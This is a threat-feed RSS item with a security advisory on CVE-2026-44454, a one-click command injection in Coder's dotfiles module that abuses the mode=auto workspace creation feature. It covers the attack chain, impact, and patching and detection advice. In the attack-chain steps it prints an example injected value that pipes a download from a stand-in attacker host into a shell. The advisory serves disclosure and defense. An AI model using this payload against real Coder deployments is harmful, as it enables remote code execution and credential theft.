<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Workspace - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/workspace/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 03 Jul 2026 11:50:24 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/workspace/feed.xml" rel="self" type="application/rss+xml"/><item><title>Coder vulnerable to workspace auto-creation via crafted URL parameters without user consent</title><link>https://feed.craftedsignal.io/briefs/2026-07-coder-workspace-rce/</link><pubDate>Fri, 03 Jul 2026 11:50:24 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-coder-workspace-rce/</guid><description>A command injection vulnerability (CVE-2026-44454) in the Coder platform's `dotfiles` module allows arbitrary code execution in a user's workspace, exploitable via a one-click attack using the `mode=auto` feature on the Create Workspace page that automatically provisions a workspace with a malicious `param.dotfiles_uri` without user consent, leading to immediate arbitrary code execution and potential data compromise or lateral movement.</description><content:encoded><![CDATA[<p>The Coder platform, a developer workspace environment, is affected by a critical command injection vulnerability (CVE-2026-44454) present in its <code>dotfiles</code> module within the <code>coder/registry</code> component. Disclosed by Aviv Donenfeld and published on 2026-07-02, this flaw arises because the module directly interpolates unsanitized user-provided <code>dotfiles_uri</code> values into shell commands, allowing for arbitrary code execution. This vulnerability is amplified by the <code>mode=auto</code> feature on the Create Workspace page of the <code>coder/coder</code> application (versions prior to 2.29.7, and 2.30.0 through 2.30.1), which enables a one-click attack. An authenticated user clicking a specially crafted URL can trigger silent workspace creation with a malicious <code>dotfiles_uri</code>, leading to immediate RCE within their provisioned workspace. The vulnerability impacts customer instances of Coder and can lead to compromise of developer environments and sensitive data.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious URL targeting a victim's Coder deployment, including <code>mode=auto</code> and a <code>param.dotfiles_uri</code> value containing shell metacharacters and arbitrary commands (e.g., <code>foo$(curl https://attacker.example/x | sh).com</code>).</li>
<li>The attacker delivers this URL to an authenticated Coder user (e.g., via email or messaging).</li>
<li>The victim clicks the crafted URL, which directs their browser to the Coder Create Workspace page.</li>
<li>Due to the <code>mode=auto</code> parameter, the Coder platform bypasses the confirmation prompt and automatically initiates the creation of a new workspace, pre-filling parameters including the attacker-controlled <code>param.dotfiles_uri</code>.</li>
<li>During the workspace provisioning process, the <code>dotfiles</code> module in <code>coder/registry</code> attempts to process the provided <code>dotfiles_uri</code>.</li>
<li>The unsanitized <code>dotfiles_uri</code> value is directly expanded by a shell, leading to command injection and the execution of the attacker's arbitrary commands (e.g., <code>curl https://attacker.example/x | sh</code>) within the context of the newly created workspace.</li>
<li>The attacker's arbitrary code gains execution inside the victim's workspace, establishing a foothold for further malicious activities.</li>
<li>The attacker can then access Git credentials, secrets, workspace files, or perform lateral movement within the Coder environment, achieving the final objective.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-44454 leads to arbitrary code execution within the victim's Coder workspace. This can result in the compromise of sensitive data, including Git credentials, API keys, and other secrets stored within the development environment, as well as the exfiltration of source code and other workspace files. Depending on the privileges assigned to the compromised workspace, this could also provide a significant foothold for lateral movement into connected systems or cloud infrastructure. The &quot;one-click&quot; nature of the <code>mode=auto</code> amplification vector significantly lowers the bar for exploitation, requiring only that an authenticated user interacts with a malicious link, making it a severe threat to organizations utilizing the Coder platform.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Patch Coder deployments immediately by upgrading <code>coder/coder</code> to at least version <code>v2.29.7</code> (ESR) or <code>v2.30.2</code> (mainline) to implement the consent dialog for <code>mode=auto</code> and to apply the primary fix for CVE-2026-44454.</li>
<li>Deploy the provided Sigma rule to detect attempts at exploiting CVE-2026-44454 in webserver logs.</li>
<li>Monitor webserver logs for <code>cs-uri-query</code> containing <code>mode=auto</code> and <code>param.dotfiles_uri</code> with shell metacharacters, as identified in the Sigma rule.</li>
<li>Block the C2 domain <code>attacker.example</code> listed in the IOC table at the DNS resolver and perimeter firewalls.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>web-application</category><category>workspace</category><category>cloud</category><category>coder</category></item></channel></rss>